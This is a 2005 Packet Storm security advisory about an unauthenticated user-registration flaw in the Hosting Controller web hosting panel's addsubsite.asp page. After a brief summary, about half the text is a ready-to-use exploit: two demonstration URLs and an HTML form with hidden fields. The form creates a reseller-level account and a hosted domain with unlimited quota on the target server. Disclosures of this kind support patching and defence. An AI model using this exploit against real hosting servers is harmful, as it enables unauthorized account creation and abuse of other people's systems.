hosting061.txt

2005-05-27T00:00:00
ID PACKETSTORM:37296
Type packetstorm
Reporter Packet Storm
Modified 2005-05-27T00:00:00

Description

                                        
                                            `Advisory Information  
-------------------------  
Software Package : Hosting Controller  
Vendor Homepage : http://www.hostingcontroller.com  
Platforms : Windows based servers  
Vulnerability : unauthenticated user registeration  
Risk : High!  
Vulnerable Versions: All version ( Tested on: v.6.1 Hotfix 1.9 )  
Vendor Contacted : 5/3/2005  
Release Date : 5/5/2005  
  
Summary  
------------  
Hosting Controller is a complete array of Web hosting automation tools for  
the Windows Server family platform.  
This vulnerability is on the admin/hosting/addsubsite.asp  
Attacker can create user and host on the target system.  
  
Exploit  
---------  
A demonstration exploit URL is provided:  
  
http://[target]/admin/hosting/addsubsite.asp?loginname=Mouse&password=123456  
http://[target]:8077/hosting/addsubsite.asp?loginname=Mouse&password=123456  
-->  
  
<FORM action="http://[target]/admin/hosting/addsubsite.asp" method="post">  
<INPUT type="hidden" name="reseller" value="resadmin" id="reseller" >  
<INPUT type="hidden" name="domaintypecheck" value="SECOND" id="Hidden1">  
Domain: <INPUT name="DomainName" value="shabgard.org" id="Hidden2"><BR>  
Username: <INPUT name="loginname" value="Mouse" id="Hidden3"><BR>  
<INPUT type="hidden" name="Quota" value="-1" id="Hidden4">  
<INPUT type="hidden" name="htype" value="27" id="htype" >  
<INPUT type="hidden" name="choice" value="1" id="Hidden7" >  
<INPUT type="hidden" name="mailaccess" value="TRUE" id="Hidden5">  
Mailserver: <INPUT name="MailServerType" value="IMail" id="Hidden6"><BR>  
Password: <INPUT name="password" value="123456" id="Hidden8"><BR><BR>  
<input type="submit" value="Make"><BR>  
  
`